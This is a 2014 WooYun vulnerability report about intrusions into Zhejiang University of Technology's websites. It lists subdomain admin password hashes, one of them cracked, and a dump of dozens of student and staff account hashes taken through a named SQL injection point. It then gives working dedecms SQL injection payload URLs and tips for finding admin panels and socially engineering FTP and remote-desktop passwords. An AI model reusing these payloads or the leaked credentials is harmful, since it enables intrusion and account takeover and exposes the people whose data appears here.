漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-082039
漏洞标题:对浙江工业大学的一次多面安全检测!
相关厂商:浙江工业大学
漏洞作者: 男神
提交时间:2014-11-05 11:07
修复时间:2014-11-10 11:08
公开时间:2014-11-10 11:08
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-11-05: 细节已通知厂商并且等待厂商处理中
2014-11-10: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
曾经的一位老同学在浙江工业大学,就想到了看看他们学校的安全性如何。用各种工具,不看不知道,一看吓一跳。漏洞太多了,@浙江工业大学的领导们,好好的整顿,修复吧。
详细说明:
简单的看了下浙江工业大学的主页,二话不说,采集二级域名。然后椰树批量扫cms类型,基本就会发现很多问题了。如果手里还握有几个cms 0day更是秒杀。简单的看了下,用到了dedecms,dedecms之前有一个爆管理员账号密码的漏洞,去试试.....漏洞还没有修复,直接就秒杀了。得到了某个分站的管理账号密码后就试着找后台,但是找了好久都没有找到。又试了其他的一些分站,漏洞还是存在。因为是多面的检测,就没有在乎细节问题。在找了一些cms漏洞后,还发现了一些注入点,ps:因为之前就对浙江工业大学检测过。那时的注入点很多,现在注入点都失效了。也是直接爆出了账号密码。因为涉及的内容比较多,就没有再深入的找后台,拿webshell,提权,等一系列的操作了。
dedecms漏洞:
http://www.cxw.zjut.edu.cn|dedecms|admin e79b88526f174d4b4e91 @chu230628
http://www.tw.zjut.edu.cn|dedecms|admin c3aeeb9c4e03a3a16475
http://www.szb.zjut.edu.cn|dedecms|admin fd58aa0753d9a618079e
注入点1:
http://kczy.zjut.edu.cn/gene/info_Print.asp?ArticleID=265
检测的表段:[admin]
----------------------------------------
[username] : admin [password] : 5e5b5761862e220a == zjutadmin
[username] : zwh [password] : da04239afa480e1e
注入点2:http://kczy.zjut.edu.cn/gene/info_Print.asp?ArticleID=265
检测的表段:[user]
----------------------------------------
[username] : 111111 [userpassword] : 965eb72c92a549dd
[username] : 20041070121 [userpassword] : 8f540e0cf13c2b55
[username] : 200806240101 [userpassword] : 65f56126f9f36b66
[username] : 200806240103 [userpassword] : 83f33070ebef72c7
[username] : 200806240108 [userpassword] : 7dcd4c2ff62f2a19
[username] : 200806240203 [userpassword] : ad893530f552ee91
[username] : 200806240205 [userpassword] : ddd92891e7532132
[username] : 200806240209 [userpassword] : 9b3b740ac5f7b756
[username] : 200806240215 [userpassword] : cd23013f632afb7e
[username] : 200806240217 [userpassword] : 2ce4a75eb264485b
[username] : 200806240218 [userpassword] : 42f2efda5ce70565
[username] : 200806240220 [userpassword] : 788abf6a17d03d2f
[username] : 200903240130 [userpassword] : 13a4724ff0e36c5a
[username] : 200906240101 [userpassword] : 1588a1455f7e77ee
[username] : 200906240104 [userpassword] : 6156861450344231
[username] : 200906240106 [userpassword] : 92f4ad4e1c46a600
[username] : 200906240108 [userpassword] : b4756b1fc78be1ea
[username] : 200906240204 [userpassword] : d0e1e2ee58b71a74
[username] : 200906240205 [userpassword] : ccbe72a3f65ffffe
[username] : 200906240206 [userpassword] : a9d029a552ca647f
[username] : 200906240220 [userpassword] : 0a9f17dac5175755
[username] : 200906240224 [userpassword] : b4e98dbc4d2d57be
[username] : 200906240230 [userpassword] : f42b09b930f6ccf7
[username] : 201006240108 [userpassword] : ac87d761943f8482
[username] : 201106240114 [userpassword] : 8c5f915f3f1cf75d
[username] : 201106240120 [userpassword] : d8fac9fc43ba0c28
[username] : 201106240121 [userpassword] : 49ba59abbe56e057
[username] : 201106240126 [userpassword] : 5dd75e0cfae5febc
[username] : 201106240206 [userpassword] : 6c5dad4e0aa4a35a
[username] : 201106240207 [userpassword] : a2c34e973fbb0b04
[username] : 201106240210 [userpassword] : 408868e2af464333
[username] : 201206240223 [userpassword] : 49ba59abbe56e057
[username] : 2110705071 [userpassword] : 1f8b95fad0a2b884
[username] : 2110905063 [userpassword] : 3d07904a09288bd2
[username] : 2110905073 [userpassword] : 60145cee2f196a4e
[username] : 2110905105 [userpassword] : 68e4d208f8bcdd4c
[username] : 2111005017 [userpassword] : f070b5a541d6bcc0
[username] : 2111205015 [userpassword] : 8761f32a3c965b9c
[username] : 2111305016 [userpassword] : facb7fa628b90ea7 == 820722376
[username] : 2111305123 [userpassword] : 0c1d66b62b834489 == 020524
[username] : 7639 [userpassword] : 1cfec082034270a7
[username] : 860210427 [userpassword] : 1f75d66a18e0ab3a
[username] : a8927766 [userpassword] : 552d15dd307218b0
[username] : aaiwuqing [userpassword] : 2c53c57ee2b8bcd1
[username] : admin [userpassword] : 87ae73e4dbea0fe1
[username] : aniu [userpassword] : 6daeadb32f3d4f96
[username] : bbqruir [userpassword] : 84ddecba1ae26b7c
[username] : bensive [userpassword] : 5580f05ca7e97237
[username] : bioo7 [userpassword] : 1634f3c90d09bf5d
[username] : biost2008 [userpassword] : 380163027ba154cb
[username] : chenbenyun [userpassword] : 5636d5fee613e74e
[username] : chenlingbei [userpassword] : 580c83f84ac995f7
[username] : cheyang [userpassword] : 2c78bcb49cb498b7
[username] : ctc20050507 [userpassword] : 759bb??????8c56?
............
另附上dedecms的exp以及一些找后台方法:
注入exp
有时候 有些 /plus/目录换成了 /plugins目录
/plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
/plus/search.php?keyword=as&typeArr[ uNion ]=a
/robots.txt
/data/admin/ver.txt
/data/mysql_error_trace.inc
第一看这里 /data/mysql_error_trace.inc 爆出来补
第二 域名作为后台 或者域名变形一下(浙江工业大学就是这种情况http://www.szb.zjut.edu.cn/zjutszb/login.php?gotopage=%2Fzjutszb%2F)
第三 先ping域名 获得ip地址 之后
http://www.bing.com/
搜索 ip:127.0.0.1 php 有可能获得后台 也可以获得其他旁注站 一般dedecms的旁站很多也是dedecms 的
第四 查看 robots.txt
http://www.dedecms.com/robots.txt 查看旁注站dedecms的站 再去社工目标站的后台地址也可以
第五 :注入exp得到账号去社工 ftp 和 3389密码
漏洞证明:
图片就不多放了,都是大同小异。安全是个整体,一个地方都不可以忽略。
修复方案:
更新cms,加狗,加强安全意识。
版权声明:转载请注明来源 男神@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-11-10 11:08
厂商回复:
最新状态:
暂无